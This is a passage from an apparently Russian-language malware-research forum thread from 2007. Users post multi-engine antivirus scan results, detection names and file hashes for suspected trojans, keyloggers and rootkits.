*Sophos	4.21.0	2007.09.09	Mal/ObfJS-C*
Sunbelt	2.2.907.0	2007.09.07	-
Symantec	10	2007.09.09	-
TheHacker	6.1.10.182	2007.09.08	-
VBA32	3.12.2.4	2007.09.08	-
VirusBuster	4.3.26:9	2007.09.09	-
Webwasher-Gateway	6.0.1	2007.09.08	-

Additional information
File size: 11472 bytes
MD5: 86e1b9b9ac2cae2ed352cfedc17aeae4
SHA1: 73ab0cdde208ae8ce9b759e3422abef38ac77e1c

----------


## XL

*zhelatin* has been updated

File tracker.exe received on 2007.09.10 15:09:56 (CET)
Current status:    finished
Result: 9/32 (28.13%)




> AhnLab-V3	2007.9.11.0	2007.09.10	-
> AntiVir	7.6.0.5	2007.09.10	-
> Authentium	4.93.8	2007.09.09	-
> Avast	4.7.1043.0	2007.09.10	-
> AVG	7.5.0.485	2007.09.10	-
> BitDefender	7.2	2007.09.10	-
> *CAT-QuickHeal	9.00	2007.09.10	(Suspicious) - DNAScan*
> ClamAV	0.91.2	2007.09.10	-
> DrWeb	4.33	2007.09.10	-
> ...

----------


## ISO

File ntldr.exe received on 2007.09.11 08:56:03 (CET)
Current status:    finished
Result: 13/32 (40.63%)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.9.11.1	2007.09.11	-
*AntiVir	7.6.0.5	2007.09.10	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.09.11	-
Avast	4.7.1043.0	2007.09.10	-
AVG	7.5.0.485	2007.09.10	-
*BitDefender	7.2	2007.09.11	Trojan.PWS.LDPinch.TAW*
CAT-QuickHeal	9.00	2007.09.10	-
ClamAV	0.91.2	2007.09.11	-
*DrWeb	4.33	2007.09.10	Trojan.Packed.166*
eSafe	7.0.15.0	2007.09.04	-
eTrust-Vet	31.1.5124	2007.09.10	-
Ewido	4.0	2007.09.10	-
FileAdvisor	1	2007.09.11	-
*Fortinet	3.11.0.0	2007.09.11	Basine.C*
F-Prot	4.3.2.48	2007.09.11	-
*F-Secure	6.70.13030.0	2007.09.11	Packed.Win32.PolyCrypt.c
Ikarus	T3.1.1.12	2007.09.11	Packed.Win32.PolyCrypt.c
Kaspersky	4.0.2.24	2007.09.11	Packed.Win32.PolyCrypt.c*
McAfee	5116	2007.09.10	-
*Microsoft	1.2803	2007.09.11	TrojanDownloader:Win32/Small.CBA*
NOD32v2	2520	2007.09.11	-
Norman	5.80.02	2007.09.10	-
Panda	9.0.0.4	2007.09.11	-
Prevx1	V2	2007.09.11	-
*Rising	19.40.10.00	2007.09.11	Packer.RyCrypt
Sophos	4.21.0	2007.09.11	Mal/Basine-C
Sunbelt	2.2.907.0	2007.09.11	Trojan-PWS.LDPinch.TAW
Symantec	10	2007.09.11	Infostealer*
TheHacker	6.1.10.183	2007.09.10	-
VBA32	3.12.2.4	2007.09.09	-
VirusBuster	4.3.26:9	2007.09.10	-
*Webwasher-Gateway	6.0.1	2007.09.10	Trojan.Crypt.XPACK.Gen*
Additional information
File size: 91983 bytes
MD5: 406bb99c9af1a2158803a42ae91362d6
SHA1: e119252d2ef300034e2746fe2f482583bfb65376
packers: RCrypt

*Added after 20 minutes*

File C2.tmp received on 2007.09.11 09:15:32 (CET)
Current status:    finished
Result: 7/32 (21.88%)
Antivirus	Version	Last Update	Result
*AhnLab-V3	2007.9.11.1	2007.09.11	Win-Trojan/Agent.22048.B*
AntiVir	7.6.0.5	2007.09.10	-
Authentium	4.93.8	2007.09.11	-
Avast	4.7.1043.0	2007.09.10	-
AVG	7.5.0.485	2007.09.10	-
BitDefender	7.2	2007.09.11	-
*CAT-QuickHeal	9.00	2007.09.10	Backdoor.Shell.d*
ClamAV	0.91.2	2007.09.11	-
DrWeb	4.33	2007.09.10	-
*eSafe	7.0.15.0	2007.09.04	suspicious Trojan/Worm*
eTrust-Vet	31.1.5124	2007.09.10	-
Ewido	4.0	2007.09.10	-
FileAdvisor	1	2007.09.11	-
Fortinet	3.11.0.0	2007.09.11	-
F-Prot	4.3.2.48	2007.09.11	-
F-Secure	6.70.13030.0	2007.09.11	-
Ikarus	T3.1.1.12	2007.09.11	-
Kaspersky	4.0.2.24	2007.09.11	-
McAfee	5116	2007.09.10	-
Microsoft	1.2803	2007.09.11	-
NOD32v2	2520	2007.09.11	-
Norman	5.80.02	2007.09.10	-
*Panda	9.0.0.4	2007.09.11	Suspicious file
Prevx1	V2	2007.09.11	Heuristic: Suspicious Self Modifying File
Rising	19.40.10.00	2007.09.11	Trojan.DL.Win32.Agent.ycp*
Sophos	4.21.0	2007.09.11	-
Sunbelt	2.2.907.0	2007.09.11	-
Symantec	10	2007.09.11	-
TheHacker	6.1.10.183	2007.09.10	-
VBA32	3.12.2.4	2007.09.09	-
VirusBuster	4.3.26:9	2007.09.10	-
*Webwasher-Gateway	6.0.1	2007.09.10	Win32.Malware.gen (suspicious)*
Additional information
File size: 22048 bytes
MD5: 546996f51122f44df0984e5a847b0f43
SHA1: 702a273bf24e2f28df0552e15eefc8793047608b
packers: BINARYRES
Prevx info: http://fileinfo.prevx.com/fileinfo.a...F5DA00EF69860B

----------


## drongo

t=12341


```
Файл protect.sys получен 2007.09.11 11:15:51 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.11.1	2007.09.11	-
AntiVir	7.6.0.5	2007.09.11	TR/Agent.NWI.1
Authentium	4.93.8	2007.09.11	-
Avast	4.7.1043.0	2007.09.10	-
AVG	7.5.0.485	2007.09.10	PSW.Agent.NWI
BitDefender	7.2	2007.09.11	-
CAT-QuickHeal	9.00	2007.09.10	-
ClamAV	0.91.2	2007.09.11	Trojan.Agent-7550
DrWeb	4.33	2007.09.10	Trojan.NtRootKit.361
eSafe	7.0.15.0	2007.09.04	-
eTrust-Vet	31.1.5124	2007.09.10	-
Ewido	4.0	2007.09.10	-
FileAdvisor	1	2007.09.11	-
Fortinet	3.11.0.0	2007.09.11	-
F-Prot	4.3.2.48	2007.09.11	-
F-Secure	6.70.13030.0	2007.09.11	-
Ikarus	T3.1.1.12	2007.09.11	-
Kaspersky	4.0.2.24	2007.09.11	-
McAfee	5116	2007.09.10	-
Microsoft	1.2803	2007.09.11	-
NOD32v2	2520	2007.09.11	Win32/SpamTool.Agent.NAJ
Norman	5.80.02	2007.09.10	-
Panda	9.0.0.4	2007.09.11	Rootkit/Agent.GJE
Prevx1	V2	2007.09.11	-
Rising	19.40.12.00	2007.09.11	-
Sophos	4.21.0	2007.09.11	-
Sunbelt	2.2.907.0	2007.09.11	SpamTool.Win32.Agent.n
Symantec	10	2007.09.11	-
TheHacker	6.1.10.184	2007.09.11	-
VBA32	3.12.2.4	2007.09.09	-
VirusBuster	4.3.26:9	2007.09.10	-
Webwasher-Gateway	6.0.1	2007.09.10	-
Дополнительная информация
File size: 18944 bytes
MD5: 13a366eef1bf920ffcf754716fda7ade
SHA1: a614eae1da5ee91f034958e23ebd8410ae981115
```

----------


## XL

Small but mighty!




> AhnLab-V3	2007.9.11.1	2007.09.11	-
> *AntiVir	7.6.0.5	2007.09.10	TR/Delphi.Downloader.Gen
> Authentium	4.93.8	2007.09.11	Possibly a new variant of W32/Threat-SysVenFak-based!Maximus
> Avast	4.7.1043.0	2007.09.10	Win32:Goldun-KG
> AVG	7.5.0.485	2007.09.10	PSW.Delf.AIR
> BitDefender	7.2	2007.09.11	Trojan.Agent.Delf.DD*
> CAT-QuickHeal	9.00	2007.09.10	-
> ClamAV	0.91.2	2007.09.11	-
> DrWeb	4.33	2007.09.10	-
> ...


Additional information
File size: 25600 bytes

----------


## ISO

File bpkun.exe received on 2007.09.12 16:28:35 (CET)
Current status:    finished
Result: 15/32 (46.88%)
Antivirus	Version	Last Update	Result
AhnLab-V3	2007.9.11.1	2007.09.12	-
*AntiVir	7.6.0.5	2007.09.12	TR/Keylog.40960.D*
Authentium	4.93.8	2007.09.12	-
Avast	4.7.1043.0	2007.09.11	-
AVG	7.5.0.485	2007.09.12	-
*BitDefender	7.2	2007.09.12	Generic.Perfloger.EC7DD4E0*
CAT-QuickHeal	9.00	2007.09.12	-
*ClamAV	0.91.2	2007.09.12	Trojan.PerfectKeylogger.153.Gen
DrWeb	4.33	2007.09.12	Trojan.Peflog.158
eSafe	7.0.15.0	2007.09.12	Spyware.Gen*
eTrust-Vet	31.1.5128	2007.09.12	-
Ewido	4.0	2007.09.12	-
*FileAdvisor	1	2007.09.12	High threat detected
Fortinet	3.11.0.0	2007.09.12	Keylog/Perfect*
F-Prot	4.3.2.48	2007.09.12	-
F-Secure	6.70.13030.0	2007.09.12	-
*Ikarus	T3.1.1.12	2007.09.12	Generic.Perfloger*
Kaspersky	4.0.2.24	2007.09.12	-
*McAfee	5117	2007.09.11	potentially unwanted program Keylog-Perfect*
Microsoft	1.2803	2007.09.12	-
NOD32v2	2524	2007.09.12	-
Norman	5.80.02	2007.09.12	-
*Panda	9.0.0.4	2007.09.12	Suspicious file
Prevx1	V2	2007.09.12	Heuristic: Suspicious Hijacker*
Rising	19.40.22.00	2007.09.12	-
Sophos	4.21.0	2007.09.12	-
*Sunbelt	2.2.907.0	2007.09.12	Perfect Keylogger
Symantec	10	2007.09.12	Spyware.Perfect*
TheHacker	6.1.10.184	2007.09.11	-
*VBA32	3.12.2.4	2007.09.12	Trojan.Peflog.158*
VirusBuster	4.3.26:9	2007.09.12	-
*Webwasher-Gateway	6.0.1	2007.09.12	Trojan.Keylog.40960.D*
Additional information
File size: 40960 bytes
MD5: ea1f8d8e45cf7630f7c00a4a26aaf54d
SHA1: 20418f04fcf2422f5e2d3019b3e1347c0a74e980
Bit9 info: http://fileadvisor.bit9.com/services...c00a4a26aaf54d
Prevx info: http://fileinfo.prevx.com/fileinfo.a...CF790070B7D8C8

----------


## drongo

*T=12413*



```
Файл SysCVMS.exe получен 2007.09.13 10:13:58 (CET)
Антивирус	Версия	Обновление	Результат
AhnLab-V3	2007.9.13.0	2007.09.12	-
AntiVir	7.6.0.10	2007.09.13	TR/Crypt.ULPM.Gen
Authentium	4.93.8	2007.09.12	-
Avast	4.7.1043.0	2007.09.12	-
AVG	7.5.0.485	2007.09.12	Win32/PolyCrypt
BitDefender	7.2	2007.09.13	-
CAT-QuickHeal	9.00	2007.09.12	(Suspicious) - DNAScan
ClamAV	0.91.2	2007.09.13	-
DrWeb	4.33	2007.09.12	Trojan.Packed.166
eSafe	7.0.15.0	2007.09.12	suspicious Trojan/Worm
eTrust-Vet	31.1.5130	2007.09.13	-
Ewido	4.0	2007.09.12	-
FileAdvisor	1	2007.09.13	-
Fortinet	3.11.0.0	2007.09.13	-
F-Prot	4.3.2.48	2007.09.12	-
F-Secure	6.70.13030.0	2007.09.13	-
Ikarus	T3.1.1.12	2007.09.13	-
Kaspersky	4.0.2.24	2007.09.13	-
McAfee	5118	2007.09.12	-
Microsoft	1.2803	2007.09.13	TrojanDownloader:Win32/Small.CBA
NOD32v2	2527	2007.09.13	-
Norman	5.80.02	2007.09.12	-
Panda	9.0.0.4	2007.09.13	-
Prevx1	V2	2007.09.13	-
Rising	19.40.31.00	2007.09.13	Packer.RyCrypt
Sophos	4.21.0	2007.09.13	Mal/EncPk-AW
Sunbelt	2.2.907.0	2007.09.13	Trojan-Downloader.Win32.Small.CBA
Symantec	10	2007.09.13	-
TheHacker	6.1.10.186	2007.09.13	-
VBA32	3.12.2.4	2007.09.12	-
VirusBuster	4.3.26:9	2007.09.12	Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway	6.0.1	2007.09.13	Trojan.Crypt.ULPM.Gen
Дополнительная информация
File size: 38860 bytes
MD5: 7e786a8a2b04c4b6829efe2f6d5dc2a4
SHA1: 85b7411e8c7b1c9c17baab7997c56b00fb64b47e
```

----------


## mayas

Something new? Or something old and well forgotten  :Wink:





> File crack.exe received on 09.13.2007 16:51:16 (CET)
> Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
> Result: 13/32 (40.63%)
> 
> 
> Antivirus 	Version 	Last Update 	Result
> AhnLab-V3	2007.9.13.0	2007.09.12	-
> AntiVir	7.6.0.10	2007.09.13	_HEUR/Crypted_
> Authentium	4.93.8	2007.09.12	*Possibly a new variant of W32/new-malware!Maximus*
> ...


*Added after 2 hours 30 minutes*

File beegen.exe received on 09.13.2007 19:26:42 (CET)


Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.9.13.0	2007.09.12	-
AntiVir	7.6.0.10	2007.09.13	*HEUR/Crypted*
Authentium	4.93.8	2007.09.12	-
Avast	4.7.1043.0	2007.09.13	-
AVG	7.5.0.485	2007.09.13	-
BitDefender	7.2	2007.09.13	-
CAT-QuickHeal	9.00	2007.09.13	-
ClamAV	0.91.2	2007.09.13	-
DrWeb	4.33	2007.09.13	*Trojan.PWS.LDPinch.2253*
eSafe	7.0.15.0	2007.09.13	_suspicious Trojan/Worm_
eTrust-Vet	31.1.5134	2007.09.13	-
Ewido	4.0	2007.09.13	-
FileAdvisor	1	2007.09.13	-
Fortinet	3.11.0.0	2007.09.13	-
F-Prot	4.3.2.48	2007.09.13	-
F-Secure	6.70.13030.0	2007.09.13	*Trojan-PSW.Win32.PdPinch.gen*
Ikarus	T3.1.1.12	2007.09.13	-
Kaspersky	4.0.2.24	2007.09.13	*Trojan-PSW.Win32.PdPinch.gen*
McAfee	5119	2007.09.13	-
Microsoft	1.2803	2007.09.13	-
NOD32v2	2528	2007.09.13	*a variant of Win32/PSW.LdPinch.RG*
Norman	5.80.02	2007.09.13	-
Panda	9.0.0.4	2007.09.13	*Trj/Ldpinch.WE*
Prevx1	V2	2007.09.13	*Heuristic: Suspicious File With Anti-Debug Technology*
Rising	19.40.32.00	2007.09.13	-
Sophos	4.21.0	2007.09.13	_Mal/Basine-C_
Sunbelt	2.2.907.0	2007.09.13	_VIPRE.Suspicious_
Symantec	10	2007.09.13	-
TheHacker	6.1.10.186	2007.09.13	*Trojan/PSW.PdPinch.gen*
VBA32	3.12.2.4	2007.09.13	*MalwareScope.Trojan-PSW.Pinch.1*
VirusBuster	4.3.26:9	2007.09.13	-
Webwasher-Gateway	6.0.1	2007.09.13	_Heuristic.Crypted_
Additional information
File size: 22016 bytes
MD5: 2d4ec44cf38fae09eb24b8cbaef894da
SHA1: 30c556ed0ea99f5147e9e396fd495176a2263a57
packers: TELOCK, ASPACK
packers: TeLock, Aspack
Prevx info: http://fileinfo.prevx.com/fileinfo.a...5FDC00135AF228
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## mayas

File WebMoney_Generator_7.6.exe received on 09.14.2007 10:07:44 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 2/32 (6.25%)


Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2007.9.14.0	2007.09.14	-
AntiVir	7.6.0.10	2007.09.14	-
Authentium	4.93.8	2007.09.14	-
Avast	4.7.1043.0	2007.09.13	-
AVG	7.5.0.485	2007.09.14	-
BitDefender	7.2	2007.09.14	-
CAT-QuickHeal	9.00	2007.09.13	-
ClamAV	0.91.2	2007.09.14	-
DrWeb	4.33	2007.09.14	-
eSafe	7.0.15.0	2007.09.13	-
eTrust-Vet	31.1.5135	2007.09.14	-
Ewido	4.0	2007.09.13	-
FileAdvisor	1	2007.09.14	-
Fortinet	3.11.0.0	2007.09.14	-
F-Prot	4.3.2.48	2007.09.13	-
F-Secure	6.70.13030.0	2007.09.14	*Trojan-Spy.Win32.Webmoner.cj*
Ikarus	T3.1.1.12	2007.09.14	-
Kaspersky	4.0.2.24	2007.09.14	*Trojan-Spy.Win32.Webmoner.cj*
McAfee	5119	2007.09.13	-
Microsoft	1.2803	2007.09.14	-
NOD32v2	2529	2007.09.13	-
Norman	5.80.02	2007.09.13	-
Panda	9.0.0.4	2007.09.13	-
Prevx1	V2	2007.09.14	-
Rising	19.40.41.00	2007.09.14	-
Sophos	4.21.0	2007.09.14	-
Sunbelt	2.2.907.0	2007.09.13	-
Symantec	10	2007.09.14	-
TheHacker	6.2.5.059	2007.09.14	-
VBA32	3.12.2.4	2007.09.13	-
VirusBuster	4.3.26:9	2007.09.13	-
Webwasher-Gateway	6.0.1	2007.09.14	-
Additional information
File size: 147456 bytes
MD5: 41d642db131764807743f380311d3c0a
SHA1: ebb3721a0ad75213c4edef298e005dc312de0680

----------


## V_Bond

http://virusinfo.info/showthread.php?t=12298 srosa.sys

AhnLab-V3	2007.9.14.0	2007.09.14	-
*AntiVir	7.6.0.10	2007.09.14	Worm/Bagle.ZJJ*
Authentium	4.93.8	2007.09.14	-
*Avast	4.7.1043.0	2007.09.14	Win32:Beagle-WF*
*AVG	7.5.0.485	2007.09.14	Obfustat.NPV*
*BitDefender	7.2	2007.09.14	Win32.Worm.Bagle.ZJJ*
CAT-QuickHeal	9.00	2007.09.14	-
ClamAV	0.91.2	2007.09.14	-
*DrWeb	4.33	2007.09.14	Win32.HLLM.Beagle*
eSafe	7.0.15.0	2007.09.13	-
eTrust-Vet	31.1.5136	2007.09.14	-
Ewido	4.0	2007.09.14	-
FileAdvisor	1	2007.09.14	-
Fortinet	3.11.0.0	2007.09.14	-
F-Prot	4.3.2.48	2007.09.13	-
F-Secure	6.70.13030.0	2007.09.14	-
*Ikarus	T3.1.1.12	2007.09.14	Email-Worm.Win32.Bagle.ik*
Kaspersky	4.0.2.24	2007.09.14	-
McAfee	5120	2007.09.14	-
Microsoft	1.2803	2007.09.14	-
*NOD32v2	2530	2007.09.14	Win32/Bagle.JQ*
Norman	5.80.02	2007.09.14	-
Panda	9.0.0.4	2007.09.14	-
*Prevx1	V2	2007.09.14	Heuristic: Suspicious File With Anti-Security Technology*
Rising	19.40.42.00	2007.09.14	-
Sophos	4.21.0	2007.09.14	-
*Sunbelt	2.2.907.0	2007.09.13	VIPRE.Suspicious*
Symantec	10	2007.09.14	-
TheHacker	6.2.5.060	2007.09.14	-
*VBA32	3.12.2.4	2007.09.14	Worm.Win32.Bagle.JQ*
VirusBuster	4.3.26:9	2007.09.14	-
*Webwasher-Gateway	6.0.1	2007.09.14	Worm.Bagle.ZJJ*
Additional information
File size: 110706 bytes
MD5: 51a9675a4300224fc23778df31f63066
SHA1: 61ade0c7f185efb24fcd73467746955c7a1910ab

----------


## Синауридзе Александр

File 35c041.dll received on 2007.09.15 04:46:30 (CET)

AhnLab-V3 2007.9.14.0 2007.09.14 - 
*AntiVir 7.6.0.10 2007.09.14 HEUR/Malware* 
*Authentium 4.93.8 2007.09.15 W32/Downldr2.AHGD* 
Avast 4.7.1043.0 2007.09.14 - 
AVG 7.5.0.485 2007.09.14 - 
BitDefender 7.2 2007.09.15 - 
CAT-QuickHeal 9.00 2007.09.14 - 
ClamAV 0.91.2 2007.09.14 - 
*DrWeb 4.33 2007.09.14 DLOADER.Trojan* 
eSafe 7.0.15.0 2007.09.13 - 
eTrust-Vet 31.1.5136 2007.09.14 - 
Ewido 4.0 2007.09.14 - 
FileAdvisor 1 2007.09.15 - 
Fortinet 3.11.0.0 2007.09.14 - 
*F-Prot 4.3.2.48 2007.09.15 W32/Downldr2.AHGD* 
F-Secure 6.70.13030.0 2007.09.15 - 
Ikarus T3.1.1.12 2007.09.15 - 
Kaspersky 4.0.2.24 2007.09.15 - 
McAfee 5120 2007.09.14 - 
Microsoft 1.2803 2007.09.15 - 
NOD32v2 2531 2007.09.15 - 
Norman 5.80.02 2007.09.14 - 
Panda 9.0.0.4 2007.09.14 - 
Prevx1 V2 2007.09.15 - 
Rising 19.40.50.00 2007.09.15 - 
Sophos 4.21.0 2007.09.15 - 
Sunbelt 2.2.907.0 2007.09.15 - 
Symantec 10 2007.09.15 - 
TheHacker 6.2.5.060 2007.09.14 - 
VBA32 3.12.2.4 2007.09.14 - 
VirusBuster 4.3.26:9 2007.09.14 - 
*Webwasher-Gateway 6.0.1 2007.09.14 Heuristic.Malware* 

Additional information
File size: 28672 bytes 
MD5: 7cd6b32f5676bfa2818276ab66699769 
SHA1: 3e6985f7d963922eba94944643c5fbf9ef5e52f5

----------


## drongo

```
 Файл jkkjk.dll получен 2007.09.17 16:21:27 (CET)

	
Антивирус 	Версия 	Обновление 	Результат
AhnLab-V3	2007.9.14.0	2007.09.14	-
AntiVir	7.6.0.10	2007.09.17	-
Authentium	4.93.8	2007.09.16	-
Avast	4.7.1043.0	2007.09.16	-
AVG	7.5.0.485	2007.09.16	Lop.DO
BitDefender	7.2	2007.09.17	DeepScan:Generic.Virtumonde.1.6AC0853B
CAT-QuickHeal	9.00	2007.09.17	-
ClamAV	0.91.2	2007.09.17	-
DrWeb	4.33	2007.09.17	-
eSafe	7.0.15.0	2007.09.17	Suspicious Trojan/Worm
eTrust-Vet	31.1.5141	2007.09.17	Win32/Vundo!generic
Ewido	4.0	2007.09.17	-
FileAdvisor	1	2007.09.17	-
Fortinet	3.11.0.0	2007.09.17	-
F-Prot	4.3.2.48	2007.09.16	-
F-Secure	6.70.13030.0	2007.09.17	W32/Vundo.dam
Ikarus	T3.1.1.12	2007.09.17	Generic.Virtumonde.1
Kaspersky	4.0.2.24	2007.09.17	-
McAfee	5120	2007.09.14	-
Microsoft	1.2803	2007.09.17	-
NOD32v2	2534	2007.09.17	-
Norman	5.80.02	2007.09.17	W32/Vundo.dam
Panda	9.0.0.4	2007.09.17	Suspicious file
Prevx1	V2	2007.09.17	Heuristic: Suspicious Self Modifying EXE
Rising	19.41.02.00	2007.09.17	-
Sophos	4.21.0	2007.09.17	Virtumundo
Sunbelt	2.2.907.0	2007.09.15	VIPRE.Suspicious
Symantec	10	2007.09.17	-
TheHacker	6.2.5.061	2007.09.17	-
VBA32	3.12.2.4	2007.09.17	-
VirusBuster	4.3.26:9	2007.09.17	Adware.Vundo.P.Gen
Webwasher-Gateway	6.0.1	2007.09.17	Virus.Win32.FileInfector.gen (suspicious)
Дополнительная информация
File size: 244832 bytes
MD5: 38a47c4538e143a09770b3a63205b1c8
SHA1: 1992381a620028d43c3f2eaea6ff7447bb92bd6e
packers: PecBundle, PECompact
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PX5=8ADD549360B20789BCA1030E35F006001839AE35
Sunbelt info: VIPRE.Suspicious is a generic dete
```

----------


## PavelA

http://virusinfo.info/showthread.php?t=12548




> File avz00001.dta (ntoskrnl.exe) received on 2007.09.19 18:41:17 (CET)
> Antivirus Version Last Update Result
> AhnLab-V3 2007.9.19.0 2007.09.19 - 
> AntiVir 7.6.0.15 2007.09.19 - 
> Authentium 4.93.8 2007.09.19 - 
> Avast 4.7.1043.0 2007.09.18 - 
> AVG 7.5.0.485 2007.09.18 - 
> BitDefender 7.2 2007.09.19 - 
> CAT-QuickHeal 9.00 2007.09.19 - 
> ClamAV 0.91.2 2007.09.19 - 
> ...

----------


## yu_mor

File syshkwh.exe received on 2007.09.21 15:32:15 (CET)
AhnLab-V3 2007.9.21.0 2007.09.20 - 
AntiVir 7.6.0.15 2007.09.21 - 
*Authentium 4.93.8 2007.09.21 W32/Bancos.ALHR 
Avast 4.7.1043.0 2007.09.20 Win32:Bancos-AOX* 
AVG 7.5.0.485 2007.09.20 - 
BitDefender 7.2 2007.09.21 - 
CAT-QuickHeal 9.00 2007.09.20 - 
*ClamAV 0.91.2 2007.09.21 Trojan.Gpcode 
DrWeb 4.33 2007.09.21 Trojan.Proxy.2024 
eSafe 7.0.15.0 2007.09.19 Suspicious Trojan/Worm* 
eTrust-Vet 31.2.5153 2007.09.21 - 
Ewido 4.0 2007.09.20 - 
FileAdvisor 1 2007.09.21 - 
Fortinet 3.11.0.0 2007.09.21 - 
*F-Prot 4.3.2.48 2007.09.21 W32/Trojan.BQCZ* 
F-Secure 6.70.13030.0 2007.09.21 - 
Ikarus T3.1.1.12 2007.09.21 - 
Kaspersky 4.0.2.24 2007.09.21 - 
McAfee 5124 2007.09.20 - 
Microsoft 1.2803 2007.09.21 - 
NOD32v2 2543 2007.09.21 - 
Norman 5.80.02 2007.09.21 - 
*Panda 9.0.0.4 2007.09.21 Trj/Bancos.RD* 
Prevx1 V2 2007.09.21 - 
Rising 19.41.42.00 2007.09.21 - 
Sophos 4.21.0 2007.09.21 - 
Sunbelt 2.2.907.0 2007.09.20 - 
*Symantec 10 2007.09.21 Infostealer.Notos!gen* 
TheHacker 6.2.5.064 2007.09.21 - 
VBA32 3.12.2.4 2007.09.20 - 
VirusBuster 4.3.26:9 2007.09.20 - 
*Webwasher-Gateway 6.0.1 2007.09.21 Win32.Malware.dam (suspicious)* 
Дополнительная информация 
File size: 40960 bytes 
MD5: acb12a0ad9d9cf124ad337ead64dbca0 
SHA1: b19526a9308b93bad4f1c1502890e6ff31ec5493 


Файл sysoaoe.exe получен 2007.09.21 15:39:15 (CET)
AhnLab-V3 2007.9.21.0 2007.09.20 - 
*AntiVir 7.6.0.15 2007.09.21 TR/Crypt.XPACK.Gen* 
Authentium 4.93.8 2007.09.21 - 
Avast 4.7.1043.0 2007.09.20 - 
AVG 7.5.0.485 2007.09.20 - 
*BitDefender 7.2 2007.09.21 Trojan.AVKiller.AS* 
CAT-QuickHeal 9.00 2007.09.20 - 
*ClamAV 0.91.2 2007.09.21 Trojan.Agent-7828 
DrWeb 4.33 2007.09.21 Trojan.MulDrop.8347 
eSafe 7.0.15.0 2007.09.19 Suspicious Trojan/Worm* 
eTrust-Vet 31.2.5153 2007.09.21 - 
Ewido 4.0 2007.09.20 - 
FileAdvisor 1 2007.09.21 - 
Fortinet 3.11.0.0 2007.09.21 - 
F-Prot 4.3.2.48 2007.09.21 - 
*F-Secure 6.70.13030.0 2007.09.21 Backdoor.Win32.Kbot.b* 
Ikarus T3.1.1.12 2007.09.21 - 
*Kaspersky 4.0.2.24 2007.09.21 Backdoor.Win32.Kbot.b* 
McAfee 5124 2007.09.20 - 
Microsoft 1.2803 2007.09.21 - 
NOD32v2 2543 2007.09.21 - 
Norman 5.80.02 2007.09.21 - 
_Panda 9.0.0.4 2007.09.21 Suspicious file_ 
Prevx1 V2 2007.09.21 - 
Rising 19.41.42.00 2007.09.21 - 
Sophos 4.21.0 2007.09.21 - 
Sunbelt 2.2.907.0 2007.09.20 - 
Symantec 10 2007.09.21 - 
TheHacker 6.2.5.064 2007.09.21 - 
VBA32 3.12.2.4 2007.09.20 - 
VirusBuster 4.3.26:9 2007.09.20 - 
*Webwasher-Gateway 6.0.1 2007.09.21 Trojan.Crypt.XPACK.Gen* 
Дополнительная информация 
File size: 11869 bytes 
MD5: 4935f52060d93b2958021b058c576d98 
SHA1: 2cec2bf1bc42a02918e640a2e7728310483463af

----------


## Kuzz

Файл moonlander.exe получен 2007.09.22 09:55:12 (CET)
 Текущий статус:     закончено   

Результат: 5/32 (15.63%)

Антивирус  Версия  Обновление  Результат
AhnLab-V3  2007.9.22.0  2007.09.21  -
  AntiVir  7.6.0.15  2007.09.21  -
  Authentium  4.93.8  2007.09.21  -
  Avast  4.7.1043.0  2007.09.22  -
  AVG  7.5.0.485  2007.09.21  -
  BitDefender  7.2  2007.09.22  -
  CAT-QuickHeal  9.00  2007.09.21  -
  ClamAV  0.91.2  2007.09.21  -
*  DrWeb  4.33  2007.09.22  Trojan.PWS.LDPinch.1903*
  eSafe  7.0.15.0  2007.09.19  -
  eTrust-Vet  31.2.5154  2007.09.21  -
  Ewido  4.0  2007.09.20  -
  FileAdvisor  1  2007.09.22  -
  Fortinet  3.11.0.0  2007.09.22  -
  F-Prot  4.3.2.48  2007.09.21  -
  F-Secure  6.70.13030.0  2007.09.21  -
*  Ikarus  T3.1.1.12  2007.09.22  Trojan-PWS.LDPinch.1903*
  Kaspersky  4.0.2.24  2007.09.22  -
  McAfee  5125  2007.09.21  -
  Microsoft  1.2803  2007.09.22  -
  NOD32v2  2544  2007.09.21  -
  Norman  5.80.02  2007.09.21  -
*  Panda  9.0.0.4  2007.09.22  Suspicious file*
  Prevx1  V2  2007.09.22  -
*  Rising  19.41.51.00  2007.09.22  Dropper.Win32.Agent.bgn*
  Sophos  4.21.0  2007.09.22  -
  Sunbelt  2.2.907.0  2007.09.22  -
  Symantec  10  2007.09.22  -
  TheHacker  6.2.5.066  2007.09.22  -
*  VBA32  3.12.2.4  2007.09.22  Trojan.PWS.LDPinch.1903*
  VirusBuster  4.3.26:9  2007.09.21  -
  Webwasher-Gateway  6.0.1  2007.09.21  -
  Дополнительная информация
File size: 166355 bytes
  MD5: 72591eee1003e63dbc5dc09faafb6ea7
  SHA1: b636546066bf609267f31212746492ef45a9f8b8

----------


## Winsent

Файл ses.exe получен 2007.09.23 13:44:04 (CET)


Антивирус	Версия	Обновление	Результат

AhnLab-V3	2007.9.22.0	2007.09.21	-
*AntiVir	7.6.0.15	2007.09.21	TR/Crypt.XPACK.Gen*
Authentium	4.93.8	2007.09.23	-
Avast	4.7.1043.0	2007.09.22	-
AVG	7.5.0.485	2007.09.22	-
*BitDefender	7.2	2007.09.23	Trojan.AVKiller.AS
CAT-QuickHeal	9.00	2007.09.21	(Suspicious) - DNAScan*
ClamAV	0.91.2	2007.09.23	-
*DrWeb	4.33	2007.09.23	Trojan.MulDrop.8347
eSafe	7.0.15.0	2007.09.19	Suspicious Trojan/Worm*
eTrust-Vet	31.2.5154	2007.09.21	-
Ewido	4.0	2007.09.20	-
FileAdvisor	1	2007.09.23	-
Fortinet	3.11.0.0	2007.09.23	-
F-Prot	4.3.2.48	2007.09.23	-
F-Secure	6.70.13030.0	2007.09.21	-
Ikarus	T3.1.1.12	2007.09.23	-
Kaspersky	4.0.2.24	2007.09.23	-
McAfee	5125	2007.09.21	-
Microsoft	1.2803	2007.09.23	-
NOD32v2	2545	2007.09.23	-
Norman	5.80.02	2007.09.21	-
*Panda	9.0.0.4	2007.09.23	Suspicious file*
Prevx1	V2	2007.09.23	-
Rising	19.41.62.00	2007.09.23	-
